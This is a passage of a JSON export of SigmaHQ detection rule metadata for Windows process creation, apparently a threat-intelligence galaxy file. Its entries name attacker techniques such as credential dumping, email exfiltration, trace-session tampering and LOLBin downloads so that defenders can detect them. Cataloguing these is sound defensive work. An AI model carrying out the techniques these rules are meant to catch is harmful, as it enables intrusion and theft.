Binary Proxy Execution" }, { "description": "Detects execution of Chromium based browser in headless mode", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_browsers_chromium_headless_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://twitter.com/mrd0x/status/1478234484881436672?s=12", "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ef9dcfed-690c-4c5d-a9d1-482cd422225c", "value": "Browser Execution In Headless Mode" }, { "description": "Detects a CodePage modification using the \"mode.com\" utility to Russian language.\nThis behavior has been used by threat actors behind Dharma ransomware.\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2024-01-17", "falsepositive": [ "Russian speaking people changing the CodePage" ], "filename": "proc_creation_win_mode_codepage_russian.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode", "https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", "https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior", "https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mode_codepage_russian.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "12fbff88-16b5-4b42-9754-cd001a789fb3", "value": "CodePage Modification Via MODE.COM To Russian Language" }, { 
"description": "Detects process dump via legitimate sqldumper.exe binary", "meta": { "author": "Kirill Kiryanov, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Legitimate MSSQL Server actions" ], "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", "https://twitter.com/countuponsec/status/910969424215232518", "https://twitter.com/countuponsec/status/910977826853068800", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", "value": "Dumping Process via Sqldumper.exe" }, { "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_pua_advancedrun_priv_user.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/security-labs/operation-bleeding-bear", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://twitter.com/splinter_code/status/1483815103279603714", "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", 
"attack.t1134.002" ] }, "related": [ { "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa00b701-44c6-4679-994d-5a18afa8a707", "value": "PUA - AdvancedRun Suspicious Execution" }, { "description": "Detects direct modification of autostart extensibility point (ASEP) in the registry using reg.exe.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", "Legitimate administrator sets up autorun keys for legitimate reasons.", "Discord" ], "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "24357373-078f-44ed-9ac4-6d334a668a11", "value": "Direct Autorun Keys Modification" }, { "description": "Detects the enumeration of a specific DLL or EXE being used by a binary via \"tasklist.exe\".\nThis is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question, in order to dump the process memory or perform other nefarious actions.\n", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2024-02-12", "falsepositive": [ "Unknown" ], "filename": 
"proc_creation_win_tasklist_module_enumeration.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/tag/svchost/", "https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tasklist_module_enumeration.yml" ], "tags": [ "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "34275eb8-fa19-436b-b959-3d9ecd53fa1f", "value": "Loaded Module Enumeration Via Tasklist.EXE" }, { "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-10", "falsepositive": [ "Parent processes other than Notepad++ that use GUP and are not currently identified" ], "filename": "proc_creation_win_gup_download.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1535322182863179776", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gup_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "44143844-0631-49ab-97a0-96387d6b2d7c", "value": "File Download Using Notepad++ GUP Utility" }, { "description": "Detects suspicious command lines used in Covenant launchers", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "creation_date": "2020-06-04", "falsepositive": [ "No established falsepositives" ], "filename": 
"proc_creation_win_hktl_covenant.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/covenant-v0-5-eee0507b85ba", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_covenant.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1059.001", "attack.t1564.003" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", "value": "HackTool - Covenant PowerShell Launcher" }, { "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", "meta": { "author": "frack113", "creation_date": "2022-12-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_runexehelper.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/", "https://twitter.com/0gtweet/status/1206692239839289344", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd71385d-fd9b-4691-9b98-2b1f7e508714", "value": "Lolbin Runexehelper Use As Proxy" }, { "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": 
"2020-06-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_disable_ie_features.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_disable_ie_features.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", "value": "Disabled IE Security Features" }, { "description": "Download or Copy file with Extrac32", "meta": { "author": "frack113", "creation_date": "2021-11-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_extrac32.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aa8e035d-7be4-48d3-a944-102aec04400d", "value": "Suspicious Extrac32 Execution" }, { "description": "Detects powershell scripts that import modules from suspicious directories", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-10", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", "value": "Import PowerShell Modules From Suspicious Directories - ProcCreation" }, { "description": "Detects execution of the SharpImpersonation tool, which can be used to manipulate tokens on a Windows computer remotely (PsExec/WmiExec) or interactively", "meta": { "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharp_impersonation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/", "https://github.com/S3cur3Th1sSh1t/SharpImpersonation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharp_impersonation.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1134.001", "attack.t1134.003" ] }, "related": [ { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8cdeb020-e31e-4f88-a582-f53dcfbda819", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "value": "HackTool - SharpImpersonation Execution" }, { "description": "Detects active directory enumeration activity using known AdFind 
CLI flags", "meta": { "author": "frack113", "creation_date": "2021-12-13", "falsepositive": [ "Authorized administrative activity" ], "filename": "proc_creation_win_pua_adfind_enumeration.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://www.joeware.net/freetools/tools/adfind/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml" ], "tags": [ "attack.discovery", "attack.t1087.002" ] }, "related": [ { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "455b9d50-15a1-4b99-853f-8d37655a4c1b", "value": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE" }, { "description": "Detects the use of NSudo tool for command execution", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "creation_date": "2022-01-24", "falsepositive": [ "Legitimate use by administrators" ], "filename": "proc_creation_win_pua_nsudo.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nsudo.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "771d1eb5-9587-4568-95fb-9ec44153a012", 
"value": "PUA - NSudo Execution" }, { "description": "Detects email exfiltration via PowerShell cmdlets", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "creation_date": "2022-09-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_email_exfil.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_email_exfil.yml" ], "tags": [ "attack.exfiltration" ] }, "uuid": "312d0384-401c-4b8b-abdf-685ffba9a332", "value": "Email Exfiltration Via Powershell" }, { "description": "Detects execution of \"Diskshadow.exe\" in script mode using the \"/s\" flag where the script is located in a potentially suspicious location.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-15", "falsepositive": [ "False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fit your organization's needs." 
], "filename": "proc_creation_win_diskshadow_script_mode_susp_location.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow", "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", "https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/", "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", "https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa1a7e52-3d02-435b-81b8-00da14dd66c1", "value": "Diskshadow Script Mode - Execution From Potential Suspicious Location" }, { "description": "Detects execution of \"csc.exe\" to compile .NET code. 
Attackers often leverage this to compile code on the fly and use it in other stages.", "meta": { "author": "Florian Roth (Nextron Systems), X__Junior (Nextron Systems)", "creation_date": "2019-08-24", "falsepositive": [ "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962", "Ansible" ], "filename": "proc_creation_win_csc_susp_dynamic_compilation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/gN3mes1s/status/1206874118282448897", "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1027.004/T1027.004.md#atomic-test-1---compile-after-delivery-using-cscexe", "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.004" ] }, "related": [ { "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", "value": "Dynamic .NET Compilation Via Csc.EXE" }, { "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", "meta": { "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-05-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml", "level": "high", "logsource.category": "process_creation", 
"logsource.product": "windows", "refs": [ "https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100", "https://www.virusradar.com/en/Win32_Kasidet.AD/description", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", "value": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\nThis rule specifically covers execution of the SimpleHelp remote support tool; the generic text above is the MITRE ATT&CK T1219 technique description.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-02-23", "falsepositive": [ "Legitimate usage of the tool" ], "filename": "proc_creation_win_remote_access_tools_simple_help.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_simple_help.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "95e60a2b-4705-444b-b7da-ba0ea81a3ee2", "value": "Remote Access Tool - Simple Help Execution" }, { "description": "Detects suspicious command-line flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-11-23", "falsepositive": [ "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.poweradmin.com/paexec/", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" ], "tags": [ "attack.resource-development", "attack.t1587.001" ] }, "related": [ { "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8834e2f7-6b4b-4f09-8906-d2276470ee23", "value": "PsExec/PAExec Escalation to LOCAL SYSTEM" }, { "description": "Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.\nThe DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Nounou Mbeiri", "creation_date": "2024-06-26", "falsepositive": [ "Legitimate usage of DSInternals for administration or audit purpose." 
], "filename": "proc_creation_win_powershell_dsinternals_cmdlets.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_dsinternals_cmdlets.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "43d91656-a9b2-4541-b7e2-6a9bd3a13f4e", "value": "DSInternals Suspicious PowerShell Cmdlets" }, { "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-02-11", "falsepositive": [ "Legitimate deactivation by administrative staff", "Installer tools that disable services, e.g. 
before log collection agent installation" ], "filename": "proc_creation_win_logman_disable_eventlog.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1359039665232306183?s=21", "https://ss64.com/nt/logman.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logman_disable_eventlog.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001", "attack.t1070.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd1f961e-0b96-436b-b7c6-38da4583ec00", "value": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE" }, { "description": "Detects calls to the AtomicTestHarnesses \"Invoke-ATHRemoteFXvGPUDisablementCommand\" which is designed to abuse the \"RemoteFXvGPUDisablement.exe\" binary to run custom PowerShell code via module load-order hijacking.", "meta": { "author": "frack113", "creation_date": "2021-07-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { 
"dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", "value": "RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses" }, { "description": "Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-17", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_webshell_hacking.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://youtu.be/7aemGhaE9ds?t=641", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml" ], "tags": [ "attack.persistence", "attack.t1505.003", "attack.t1018", "attack.t1033", "attack.t1087" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", "value": "Webshell Hacking Activity Patterns" }, { "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", "meta": { "author": "Teymur Kheirkhabarov", "creation_date": "2019-10-26", "falsepositive": [ 
"Unknown" ], "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "value": "Potential Privilege Escalation via Service Permissions Weakness" }, { "description": "Detects execution of Cmdl32 with the \"/vpn\" and \"/lan\" flags.\nAttackers can abuse this utility in order to download arbitrary files via a configuration file.\nInspect the location and the content of the file passed as an argument in order to determine if it is suspicious.\n", "meta": { "author": "frack113", "creation_date": "2021-11-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmdl32_arbitrary_file_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/SwiftOnSecurity/status/1455897435063074824", "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/", "https://github.com/LOLBAS-Project/LOLBAS/pull/151", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdl32_arbitrary_file_download.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218", "attack.t1202" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
